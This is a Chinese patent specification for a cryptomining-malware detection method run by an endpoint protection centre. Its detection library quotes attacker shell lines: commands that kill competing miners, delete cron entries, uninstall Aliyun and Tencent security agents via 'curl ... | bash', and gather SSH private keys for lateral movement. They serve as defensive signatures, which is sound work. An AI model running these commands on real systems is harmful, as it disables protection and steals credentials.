一种挖矿行为检测方法、装置、电子设备及存储介质

技术领域

本发明涉及计算机技术领域，尤其涉及一种挖矿行为检测方法、装置、电子设备及存储介质。

背景技术

挖矿木马是通过各种手段将挖矿程序植入到受害者的计算机中，在受害者不知情的情况下，利用受害者计算机的算力进行挖矿。挖矿木马进行超频运算时占用大量CPU资源，导致计算机上其他应用无法正常运行。不法分子为了使用更多算力资源，一般会对全网主机进行漏洞扫描、SSH爆破等攻击手段。部分挖矿木马还具备横向传播的特点，在成功入侵一台主机后，尝试对内网其他机器进行蠕虫式的横向渗透，并在被入侵的机器上持久化驻留，长期利用机器挖矿获利。

传统终端杀毒软件需要结合威胁情报和已知病毒库对挖矿木马进行检测，但挖矿木马在植入终端机器前，会利用漏洞和暴力破解等方式获取终端设备权限，在获取终端设备权限后，下载不同的功能性脚本进行后续操作，其中会包括卸载当前杀毒软件操作的脚本。也就是说，在终端杀毒软件还未检测到挖矿木马前，终端杀毒软件已被卸载，因此，无法起到防护作用，挖矿程序进行挖矿将再无阻拦，并且可持久化的进行非法挖矿操作。

发明内容

有鉴于此，本发明实施例提供一种挖矿行为检测方法、装置、电子设备及存储介质，可及时发现终端设备中出现的挖矿行为并进行处置，以有效防护终端设备不会被植入挖矿木马。

在第一方面，本发明实施例提供一种挖矿行为检测方法，该方法包括：

采集终端设备的全量信息；

根据预设的挖矿行为信息库判断所述全量信息中是否存在挖矿行为信息；

如果所述全量信息中存在所述挖矿行为信息，则删除所述终端设备中的所述挖矿行为信息。

优选的，所述如果所述全量信息中存在所述挖矿行为信息，则删除所述终端设备中的所述挖矿行为信息，包括：如果所述全量信息中存在所述挖矿行为信息，则输出第一告警信息；当收到删除指令时，删除所述终端设备中的所述挖矿行为信息。

优选的，在所述输出第一告警信息之后，所述方法还包括：当收到观察指令时或在预设时间内未收到任何指令，对所述挖矿行为信息进行隔离监测；当监测到下载行为时，生成监测日志，并输出第二告警信息，所述第二告警信息包括所述监测日志。

优选的，所述挖矿行为信息库包括：清除竞品行为信息库、清除网络行为信息库、计划任务行为信息库、卸载安全软件行为信息库、横向移动行为信息库。

在第二方面，本发明实施例提供一种挖矿行为检测装置，该装置包括：

采集单元，用于采集终端设备的全量信息；

判断单元，用于根据预设的挖矿行为信息库判断所述全量信息中是否存在挖矿行为信息；

处置单元，用于如果所述全量信息中存在所述挖矿行为信息，则删除所述终端设备中的所述挖矿行为信息。

优选的，所述处置单元，具体用于：如果所述全量信息中存在所述挖矿行为信息，则输出第一告警信息；当收到删除指令时，删除所述终端设备中的所述挖矿行为信息。

优选的，所述处置单元具体还用于：当收到观察指令时或在预设时间内未收到任何指令，对所述挖矿行为信息进行隔离监测；当监测到下载行为时，生成监测日志，并输出第二告警信息，所述第二告警信息包括所述监测日志。

优选的，所述挖矿行为信息库包括：清除竞品行为信息库、清除网络行为信息库、计划任务行为信息库、卸载安全软件行为信息库、横向移动行为信息库。

在第三方面，本发明实施例提供一种电子设备，所述电子设备包括：壳体、处理器、存储器、电路板和电源电路，其中，电路板安置在壳体围成的空间内部，处理器和存储器设置在电路板上；电源电路，用于为上述电子设备的各个电路或器件供电；存储器用于存储可执行程序代码；处理器通过读取存储器中存储的可执行程序代码来运行与可执行程序代码对应的程序，用于执行前述第一方面所述的挖矿行为检测方法。

第四方面，本发明实施例提供一种计算机可读存储介质，所述计算机可读存储介质存储有一个或者多个程序，所述一个或者多个程序可被一个或者多个处理器执行，以实现第一方面所述的挖矿行为检测方法。

本发明实施例提供的一种挖矿行为检测方法、装置、电子设备及存储介质，通过采集终端设备的全量信息，根据预设的挖矿行为信息库判断全量信息中是否存在挖矿行为信息，如果全量信息中存在所述挖矿行为信息，则删除终端设备中的挖矿行为信息。基于此，可及时发现终端设备中出现的挖矿行为并进行处置，以有效防护终端设备不会被植入挖矿木马。

附图说明

为了更清楚地说明本发明实施例或现有技术中的技术方案，下面将对实施例或现有技术描述中所需要使用的附图作简单地介绍，显而易见地，下面描述中的附图仅仅是本发明的一些实施例，对于本领域普通技术人员来讲，在不付出创造性劳动的前提下，还可以根据这些附图获得其它的附图。

图1为本发明的实施例提供的一种挖矿行为检测方法的流程示意图；

图2为本发明的实施例提供的另一种挖矿行为检测方法的流程示意图；

图3为本发明的实施例提供的一种挖矿行为检测装置的结构示意图；

图4为本发明电子设备一个实施例的结构示意图。

具体实施方式

下面结合附图对本发明实施例进行详细描述。

应当明确，所描述的实施例仅仅是本发明一部分实施例，而不是全部的实施例。基于本发明中的实施例，本领域普通技术人员在没有作出创造性劳动前提下所获得的所有其它实施例，都属于本发明保护的范围。

图1为本发明的实施例提供的一种挖矿行为检测方法的流程示意图。该挖矿行为检测方法可以应用于电子设备，具体由终端防护中心(EDR)执行。

如图1所示，本实施例的挖矿行为检测方法可以包括：

步骤101，采集终端设备的全量信息。

在一个例子中，全量信息包括但不限于：报告终端的进程信息、网络信息、启动项信息、内核信息、钩子扫描信息、服务信息、驱动信息、文件信息和注册表信息。

优选的，如果存在未知挖矿行为并进行全量信息采集，会造成终端设备卡顿，影响性能，因此，该全量信息可以具体为脚本信息，这样能排除大面积的正常文件采集工作。而且终端设备一般情况下不会使用脚本进行工作，因此采集脚本信息具有一定的针对性，不会影响操作系统性能。具体的，针对Windows平台需要采集批处理(bat)和PowerShell(ps1)文件，针对Linux平台采集sh脚本。

步骤102，根据预设的挖矿行为信息库判断该全量信息中是否存在挖矿行为信息。

具体的，预设的挖矿行为信息库是依据长期对终端挖矿行为进行实时发现得到的攻击信息进行画像而生成的行为信息库。挖矿组织在利用漏洞进行攻击成功后，会根据不同的操作系统在终端设备投放不同类型的攻击脚本，该攻击脚本便可作为挖矿行为信息，添加至挖矿行为信息库。

优选的，挖矿行为信息库包括但不限于：清除竞品行为信息库、清除网络行为信息库、计划任务行为信息库、卸载安全软件行为信息库、横向移动行为信息库。

其中，清除竞品行为信息库中的行为信息，包括但不限于：结束竞品挖矿进程，删除竞品挖矿软件和脚本文件。具体行为信息举例如下：

ps aux|grep-vwkdevtmpfsi|grep-v grep|awk'{if($3>80.0)print$2}'|xargs-I％kill-9％

pkill-f kthreaddi

cat/tmp/.pg_stat.0|xargs-I％kill-9％

pgrep-f slxfbkmxtd|xargs-I％kill-9％

rm-rf/tmp/wc.conf

清除网络行为信息库中的行为信息，包括但不限于：清除端口，清除IP地址。具体行为信息举例如下

netstat-anp|grep 185.71.65.238|awk'{print$7}'|awk-F'[/]”{print$1}'|xargs-I％kill-9％

netstat-anp|grep 140.82.52.87|awk'{print$7}'|awk-F'[/]”{print$1}'|xargs-I％kill-9％

netstat-anp|grep:2222|awk'{print$7}'|awk-F'[/]”{print$1}'|grep-v"-"|xargs-I％kill-9％

netstat-anp|grep:3333|awk'{print$7}'|awk-F'[/]”{print$1}'|grep-v"-"|xargs-I％kill-9％

netstat-anp|grep:3389|awk'{print$7}'|awk-F'[/]”{print$1}'|grep-v"-"|xargs-I％kill-9％

计划任务行为信息库中的行为信息，包括但不限于：任务计划名。具体行为信息举例如下：

crontab-l|sed'/base64/d'|crontab-

crontab-l|sed'/update.sh/d'|crontab-

crontab-l|sed'/logo4/d'|crontab-

crontab-l|sed'/logo9/d'|crontab-

crontab-l|sed'/logo0/d'|crontab-

卸载安全行为信息库中的行为信息，包括但不限于：卸载安全软件。具体行为信息举例如下：

if ps aux|grep-i'[a]liyun'；then

curl http://update.aegis.aliyun.com/download/uninstall.sh|bash

curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh|bash

pkillaliyun-service

rm-rf/etc/init.d/agentwatch/usr/sbin/aliyun-service

rm-rf/usr/local/aegis*

systemctl stop aliyun.service

systemctl disable aliyun.service

service bcm-agent stop

yum remove bcm-agent-y

apt-get remove bcm-agent-y

elifps aux|grep-i'[y]unjing'；then

/usr/local/qcloud/stargate/admin/uninstall.sh

/usr/local/qcloud/YunJing/uninst.sh

/usr/local/qcloud/monitor/barad/admin/uninstall.sh

fi

横向移动行为信息库中的行为信息，包括但不限于：横向移动、获取终端设备秘钥。具体行为信息举例如下：

KEYS＝$(find～//root/home-maxdepth 3-name'id_rsa*'|grep-vw pub)

KEYS2＝$(cat～/.ssh/config/home/*/.ssh/config/root/.ssh/config|grepIdentityFile|awk-F"IdentityFile"'{print$2}')

KEYS3＝$(cat～/.bash_history/home/*/.bash_history/root/.bash_history|grep-E"(ssh|scp)"|awk-F'-i”{print$2}'|awk'{print$1'})

当全量信息中有至少一个信息与预设的挖矿行为信息库中的行为信息匹配，则确认该全量信息中存在挖矿行为信息。

步骤103，如果全量信息中存在挖矿行为信息，则删除终端设备中的挖矿行为信息。

优选的，如图2所示，步骤103可以具体包括：

步骤1031，如果全量信息中存在挖矿行为信息，则输出第一告警信息。

具体的，该第一告警信息用于提示用户终端设备出现挖矿行为，并提示用户是否需要处置，处置可以包括删除或是观察，如用户希望及时确保终端设备安全，则可选择删除，如终端用户希望获取更多的挖矿行为信息，则可选择观察。因此，当用户输入删除执行时，执行步骤1032，当用户输入观察指令时，执行步骤1033。

可以理解的是，用户可能无法及时看到该第一告警信息，因此可预设一处置时间，如24小时，如在24小时内未收到用户的任何指令，为确保终端设备的安全，可执行步骤1033。

步骤1032，当收到删除指令时，删除终端设备中的挖矿行为信息。

步骤1033，当收到观察指令时或在预设时间内未收到任何指令，对挖矿行为信息进行隔离监测。

步骤1034，当监测到下载行为时，生成监测日志，并输出第二告警信息。

具体的，该第二告警信息包括监测日志。用户在看到第二告警信息后，可根据监测日志进行逐条验证，再次确认是否存在挖矿行为，之后可根据全量信息进行逐条人工清除。

通过利用本发明实施例提供的一种挖矿行为检测方法，采集终端设备的全量信息，根据预设的挖矿行为信息库判断全量信息中是否存在挖矿行为信息，如果全量信息中存在所述挖矿行为信息，则删除终端设备中的挖矿行为信息。基于此，可及时发现终端设备中出现的挖矿行为并进行处置，以有效防护终端设备不会被植入挖矿木马。

图3为本发明实施例提供的一种挖矿行为检测装置的结构示意图。该装置可以应用于电子设备。

如图3所示，本实施例的挖矿行为检测装置可以包括：

采集单元301，用于采集终端设备的全量信息；

判断单元302，用于根据预设的挖矿行为信息库判断所述全量信息中是否存在挖矿行为信息；

处置单元303，用于如果所述全量信息中存在所述挖矿行为信息，则删除所述终端设备中的所述挖矿行为信息。

优选的，所述处置单元303，具体用于：如果所述全量信息中存在所述挖矿行为信息，则输出第一告警信息；当收到删除指令时，删除所述终端设备中的所述挖矿行为信息。

优选的，所述处置单元303具体还用于：当收到观察指令时或在预设时间内未收到任何指令，对所述挖矿行为信息进行隔离监测；当监测到下载行为时，生成监测日志，并输出第二告警信息，所述第二告警信息包括所述监测日志。

优选的，所述全量信息具体为脚本信息。

优选的，所述挖矿行为信息库包括：清除竞品行为信息库、清除网络行为信息库、计划任务行为信息库、卸载安全软件行为信息库、横向移动行为信息库。

通过利用本发明实施例提供的一种挖矿行为检测装置，采集终端设备的全量信息，根据预设的挖矿行为信息库判断全量信息中是否存在挖矿行为信息，如果全量信息中存在所述挖矿行为信息，则删除终端设备中的挖矿行为信息。基于此，可及时发现终端设备中出现的挖矿行为并进行处置，以有效防护终端设备不会被植入挖矿木马。

本发明实施例还提供一种电子设备。图4为本发明电子设备一个实施例的结构示意图，可以实现本发明图1所示实施例的流程，如图4所示，上述电子设备可以包括：壳体41、处理器42、存储器43、电路板44和电源电路45，其中，电路板44安置在壳体41围成的空间内部，处理器42和存储器43设置在电路板44上；电源电路45，用于为上述电子设备的各个电路或器件供电；存储器43用于存储可执行程序代码；处理器42通过读取存储器43中存储的可执行程序代码来运行与可执行程序代码对应的程序，用于执行前述任一实施例所述的方法。

该电子设备以多种形式存在，包括但不限于：

(1)移动通信设备：这类设备的特点是具备移动通信功能，并且以提供话音、数据通信为主要目标。这类终端包括：智能手机(例如iPhone)、多媒体手机、功能性手机，以及低端手机等。

(2)超移动个人计算机设备：这类设备属于个人计算机的范畴，有计算和处理功能，一般也具备移动上网特性。这类终端包括：PDA、MID和UMPC设备等，例如iPad。

(3)便携式娱乐设备：这类设备可以显示和播放多媒体内容。该类设备包括：音频、视频播放模块(例如iPod)，掌上游戏机，电子书，以及智能玩具和便携式车载导航设备。

(4)服务器：提供计算服务的设备，服务器的构成包括处理器、硬盘、内存、系统总线等，服务器和通用的计算机架构类似，但是由于需要提供高可靠的服务，因此在处理能力、稳定性、可靠性、安全性、可扩展性、可管理性等方面要求较高。

(5)其他具有数据交互功能的电子设备。

本发明实施例提供一种计算机可读存储介质，所述计算机可读存储介质存储有一个或者多个程序，所述一个或者多个程序可被一个或者多个处理器执行，以实现前述任一实施例所述的方法。

需要说明的是，在本文中，诸如第一和第二等之类的关系术语仅仅用来将一个实体或者操作与另一个实体或操作区分开来，而不一定要求或者暗示这些实体或操作之间存在任何这种实际的关系或者顺序。而且，术语“包括”、“包含”或者其任何其他变体意在涵盖非排他性的包含，从而使得包括一系列要素的过程、方法、物品或者设备不仅包括那些要素，而且还包括没有明确列出的其他要素，或者是还包括为这种过程、方法、物品或者设备所固有的要素。在没有更多限制的情况下，由语句“包括一个……”限定的要素，并不排除在包括所述要素的过程、方法、物品或者设备中还存在另外的相同要素。

本说明书中的各个实施例均采用相关的方式描述，各个实施例之间相同相似的部分互相参见即可，每个实施例重点说明的都是与其他实施例的不同之处。尤其，对于装置实施例而言，由于其基本相似于方法实施例，所以描述的比较简单，相关之处参见方法实施例的部分说明即可。

为了描述的方便，描述以上装置是以功能分为各种单元/模块分别描述。当然，在实施本发明时可以把各单元/模块的功能在同一个或多个软件和/或硬件中实现。

本领域普通技术人员可以理解实现上述实施例方法中的全部或部分流程，是可以通过计算机程序来指令相关的硬件来完成，所述的程序可存储于一计算机可读取存储介质中，该程序在执行时，可包括如上述各方法的实施例的流程。其中，所述的存储介质可为磁碟、光盘、只读存储记忆体(Read-Only Memory，ROM)或随机存储记忆体(Random AccessMemory，RAM)等。

以上所述，仅为本发明的具体实施方式，但本发明的保护范围并不局限于此，任何熟悉本技术领域的技术人员在本发明揭露的技术范围内，可轻易想到的变化或替换，都应涵盖在本发明的保护范围之内。因此，本发明的保护范围应以权利要求的保护范围为准。